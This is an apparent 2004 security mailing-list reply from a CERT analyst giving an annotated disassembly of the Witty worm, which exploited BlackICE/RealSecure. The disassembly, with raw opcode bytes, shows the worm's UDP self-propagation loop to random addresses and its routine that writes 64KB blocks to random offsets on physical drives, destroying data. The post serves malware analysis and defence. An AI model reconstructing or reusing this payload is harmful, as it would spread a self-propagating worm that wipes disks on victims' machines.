<<< Date Index >>>     <<< Thread Index >>>

Re: Any dissasemblies of the Witty worm yet?




Here is some preliminary work, I don't claim it to be exact, since
the API calls are guessed at the moment (I still have to get BlackICE),
but it should give a pretty good idea on how the thing work.

The WriteFile might be ReadFile (which is the way Symantec sees it in
their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
the memory at 0x5e000000 might be code section, then not writeable)
makes me think it writes arbitrary places of random physical disks -
with the consequences one can imagine.

Correct me if I am wrong, I would like to receive feedback about this.

Regards,

Kostya Kortchinsky
CERT RENATER

Nicholas Weaver wrote:

Has anyone done a dissassembly of the "Witty" worm yet?
http://isc.incidents.org/diary.html?date=2004-03-20
http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html

using the http://seclists.org/lists/bugtraq/2004/Mar/0181.html
        recent bug in BlackICE/RealSecure?

        We are seeing a lot of activity from this worm, although even
a small infection would generate a LOT of traffic (a side-effect of
bandwidth-limited worms, such as single-packet UDP worms).

        Thanks.


seg000:000000D1 ; ---------------------------------------------------------------------------
seg000:000000D1
seg000:000000D1 loc_D1: ; CODE XREF: seg000:000002ABj
seg000:000000D1 89 E7                             mov     edi, esp
seg000:000000D3 8B 7F 14                          mov     edi, [edi+14h]
seg000:000000D6 83 C7 08                          add     edi, 8
seg000:000000D9 81 C4 E8 FD FF FF                 add     esp, 0FFFFFDE8h
seg000:000000DF 31 C9                             xor     ecx, ecx
seg000:000000E1 66 B9 33 32 mov cx, 3233h ; 32
seg000:000000E5 51                                push    ecx
seg000:000000E6 68 77 73 32 5F push 5F327377h ; ws2_
seg000:000000EB 54                                push    esp
seg000:000000EC                                   db      3Eh
seg000:000000EC 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; Probably LoadLibrary
seg000:000000F3 89 C3                             mov     ebx, eax
seg000:000000F5 31 C9                             xor     ecx, ecx
seg000:000000F7 66 B9 65 74 mov cx, 7465h ; et
seg000:000000FB 51                                push    ecx
seg000:000000FC 68 73 6F 63 6B push 6B636F73h ; sock
seg000:00000101 54                                push    esp
seg000:00000102 53                                push    ebx
seg000:00000103                                   db      3Eh
seg000:00000103 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:0000010A 6A 11 push 11h ; IPPROTO_UDP seg000:0000010C 6A 02 push 2 ; SOCK_DGRAM seg000:0000010E 6A 02 push 2 ; AF_INET seg000:00000110 FF D0 call eax ; socket()
seg000:00000112 89 C6                             mov     esi, eax
seg000:00000114 31 C9                             xor     ecx, ecx
seg000:00000116 51                                push    ecx
seg000:00000117 68 62 69 6E 64 push 646E6962h ; bind
seg000:0000011C 54                                push    esp
seg000:0000011D 53                                push    ebx
seg000:0000011E                                   db      3Eh
seg000:0000011E 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress
seg000:00000125 31 C9                             xor     ecx, ecx
seg000:00000127 51                                push    ecx
seg000:00000128 51                                push    ecx
seg000:00000129 51 push ecx ; sin.sin_addr.s_addr = INADDR_ANY seg000:0000012A 81 E9 FE FF F0 5F sub ecx, 5FF0FFFEh ; 0xa00f0002 seg000:00000130 51 push ecx ; sin.sin_family = AF_INET seg000:00000130 ; sin.sin_port = htons(4000)
seg000:00000131 89 E1                             mov     ecx, esp
seg000:00000133 6A 10 push 10h ; sizeof(struct sockaddr) seg000:00000135 51 push ecx ; &sin seg000:00000136 56 push esi ; s seg000:00000137 FF D0 call eax ; bind()
seg000:00000139 31 C9                             xor     ecx, ecx
seg000:0000013B 66 B9 74 6F mov cx, 6F74h ; to
seg000:0000013F 51                                push    ecx
seg000:00000140 68 73 65 6E 64 push 646E6573h ; send
seg000:00000145 54                                push    esp
seg000:00000146 53                                push    ebx
seg000:00000147                                   db      3Eh
seg000:00000147 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress
seg000:0000014E 89 C3                             mov     ebx, eax
seg000:00000150 83 C4 3C                          add     esp, 3Ch
seg000:00000153
seg000:00000153 loc_153: ; CODE XREF: seg000:000002A2j
seg000:00000153 31 C9                             xor     ecx, ecx
seg000:00000155 51                                push    ecx
seg000:00000156 68 65 6C 33 32 push 32336C65h ; el32 seg000:0000015B 68 6B 65 72 6E push 6E72656Bh ; kern
seg000:00000160 54                                push    esp
seg000:00000161                                   db      3Eh
seg000:00000161 3E FF 15 9C 40 0D+ call dword ptr ds:5E0D409Ch ; Probably LoadLibrary
seg000:00000168 31 C9                             xor     ecx, ecx
seg000:0000016A 51                                push    ecx
seg000:0000016B 68 6F 75 6E 74 push 746E756Fh ; ount seg000:00000170 68 69 63 6B 43 push 436B6369h ; ickC seg000:00000175 68 47 65 74 54 push 54746547h ; GetT
seg000:0000017A 54                                push    esp
seg000:0000017B 50                                push    eax
seg000:0000017C                                   db      3Eh
seg000:0000017C 3E FF 15 98 40 0D+ call dword ptr ds:5E0D4098h ; Probably GetProcAddress seg000:00000183 FF D0 call eax ; GetTickCount()
seg000:00000185 89 C5                             mov     ebp, eax
seg000:00000187 83 C4 1C                          add     esp, 1Ch
seg000:0000018A 31 C9                             xor     ecx, ecx
seg000:0000018C 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; 0x4e20
seg000:00000192
seg000:00000192 loc_192: ; CODE XREF: seg000:000001F8j seg000:00000192 ; seg000:00000255j
seg000:00000192 51                                push    ecx
seg000:00000193 31 C0                             xor     eax, eax
seg000:00000195 2D 03 BC FC FF sub eax, 0FFFCBC03h ; 0x343fd
seg000:0000019A F7 E5                             mul     ebp
seg000:0000019C 2D 3D 61 D9 FF sub eax, 0FFD9613Dh ; 0x269ec3 seg000:000001A1 89 C1 mov ecx, eax ; rand() function, without the 0x7fff mask, shift coming afterwards seg000:000001A1 ; srand() done with GetTickCount()
seg000:000001A3 31 C0                             xor     eax, eax
seg000:000001A5 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001AA F7 E1                             mul     ecx
seg000:000001AC 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001B1 89 C5                             mov     ebp, eax
seg000:000001B3 31 D2                             xor     edx, edx
seg000:000001B5 52                                push    edx
seg000:000001B6 52                                push    edx
seg000:000001B7 C1 E9 10                          shr     ecx, 10h
seg000:000001BA 66 89 C8                          mov     ax, cx
seg000:000001BD 50 push eax ; to.sin_addr.s_addr = (rand() << 16) | rand()
seg000:000001BE 31 C0                             xor     eax, eax
seg000:000001C0 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001C5 F7 E5                             mul     ebp
seg000:000001C7 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001CC 89 C5                             mov     ebp, eax
seg000:000001CE 30 E4                             xor     ah, ah
seg000:000001D0 B0 02                             mov     al, 2
seg000:000001D2 50 push eax ; to.sin_family = AF_INET seg000:000001D2 ; to.sin_port = rand()
seg000:000001D3 89 E0                             mov     eax, esp
seg000:000001D5 6A 10 push 10h ; sizeof(struct sockaddr) seg000:000001D7 50 push eax ; &to
seg000:000001D8 31 C0                             xor     eax, eax
seg000:000001DA 50 push eax ; flags
seg000:000001DB 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001E0 F7 E5                             mul     ebp
seg000:000001E2 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001E7 89 C5                             mov     ebp, eax
seg000:000001E9 C1 E8 17                          shr     eax, 17h
seg000:000001EC 80 C4 03                          add     ah, 3
seg000:000001EF 50 push eax ; len = 0x300 + (rand() >> 7) seg000:000001F0 57 push edi ; buf seg000:000001F1 56 push esi ; s seg000:000001F2 FF D3 call ebx ; sendto()
seg000:000001F4 83 C4 10                          add     esp, 10h
seg000:000001F7 59                                pop     ecx
seg000:000001F8 E2 98                             loop    loc_192
seg000:000001FA 31 C0                             xor     eax, eax
seg000:000001FC 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000201 F7 E5                             mul     ebp
seg000:00000203 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:00000208 89 C5                             mov     ebp, eax
seg000:0000020A C1 E8 10                          shr     eax, 10h
seg000:0000020D 80 E4 07                          and     ah, 7
seg000:00000210 80 CC 30 or ah, 30h ; 0x30 | (rand() & 7) seg000:00000213 B0 45 mov al, 45h ; 'E' ; E
seg000:00000215 50                                push    eax
seg000:00000216 68 44 52 49 56 push 56495244h ; DRIV seg000:0000021B 68 49 43 41 4C push 4C414349h ; ICAL seg000:00000220 68 50 48 59 53 push 53594850h ; PHYS seg000:00000225 68 5C 5C 2E 5C push 5C2E5C5Ch ; \\.\ seg000:00000225 ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
seg000:0000022A 89 E0                             mov     eax, esp
seg000:0000022C 31 C9                             xor     ecx, ecx
seg000:0000022E 51 push ecx ; NULL
seg000:0000022F B2 20                             mov     dl, 20h ; ' '
seg000:00000231 C1 E2 18                          shl     edx, 18h
seg000:00000234 52 push edx ; FILE_FLAG_NO_BUFFERING (0x20000000) seg000:00000235 6A 03 push 3 ; OPEN_EXISTING seg000:00000237 51 push ecx ; NULL seg000:00000238 6A 03 push 3 ; FILE_SHARE_READ | FILE_SHARE_WRITE
seg000:0000023A D1 E2                             shl     edx, 1
seg000:0000023C 52 push edx ; GENERIC_WRITE (0x40000000) seg000:0000023D 50 push eax ; lpFileName
seg000:0000023E                                   db      3Eh
seg000:0000023E 3E FF 15 DC 40 0D+ call dword ptr ds:5E0D40DCh ; Probably CreateFile
seg000:00000245 83 C4 14                          add     esp, 14h
seg000:00000248 31 C9                             xor     ecx, ecx
seg000:0000024A 81 E9 E0 B1 FF FF sub ecx, 0FFFFB1E0h ; 0x4e20
seg000:00000250 3D FF FF FF FF                    cmp     eax, 0FFFFFFFFh
seg000:00000255 0F 84 37 FF FF FF                 jz      loc_192
seg000:0000025B 56 push esi ; (saving socket)
seg000:0000025C 89 C6                             mov     esi, eax
seg000:0000025E 31 C0                             xor     eax, eax
seg000:00000260 50 push eax ; FILE_BEGIN seg000:00000261 50 push eax ; NULL
seg000:00000262 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000267 F7 E5                             mul     ebp
seg000:00000269 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:0000026E 89 C5                             mov     ebp, eax
seg000:00000270 D1 E8                             shr     eax, 1
seg000:00000272 66 89 C8                          mov     ax, cx
seg000:00000275 50 push eax ; (rand() << 15) | 0x4e20 seg000:00000276 56 push esi ; hFile
seg000:00000277                                   db      3Eh
seg000:00000277 3E FF 15 C4 40 0D+ call dword ptr ds:5E0D40C4h ; Probably SetFilePointer seg000:00000277 5E ; (really not sure about this one)
seg000:0000027E 31 C9                             xor     ecx, ecx
seg000:00000280 51 push ecx ; 0
seg000:00000281 89 E2                             mov     edx, esp
seg000:00000283 51 push ecx ; NULL seg000:00000284 52 push edx ; lpNumberOfBytesWritten
seg000:00000285 B5 80                             mov     ch, 80h ; 'Ç'
seg000:00000287 D1 E1                             shl     ecx, 1
seg000:00000289 51 push ecx ; nNumberOfBytesToWrite (0x10000)
seg000:0000028A B1 5E                             mov     cl, 5Eh ; '^'
seg000:0000028C C1 E1 18                          shl     ecx, 18h
seg000:0000028F 51 push ecx ; lpBuffer (0x5e000000) seg000:00000290 56 push esi ; hFile
seg000:00000291                                   db      3Eh
seg000:00000291 3E FF 15 94 40 0D+ call dword ptr ds:5E0D4094h ; Probably WriteFile seg000:00000298 56 push esi ; hObject
seg000:00000299                                   db      3Eh
seg000:00000299 3E FF 15 38 40 0D+ call dword ptr ds:5E0D4038h ; Probably CloseHandle
seg000:000002A0 5E                                pop     esi
seg000:000002A1 5E pop esi ; (restoring socket)
seg000:000002A2 E9 AC FE FF FF                    jmp     loc_153
seg000:000002A2 ; ---------------------------------------------------------------------------
seg000:000002A7 63 76 07 5E                       dd 5E077663h
seg000:000002AB ; ---------------------------------------------------------------------------
seg000:000002AB E9 21 FE FF FF                    jmp     loc_D1
seg000:000002AB ; ---------------------------------------------------------------------------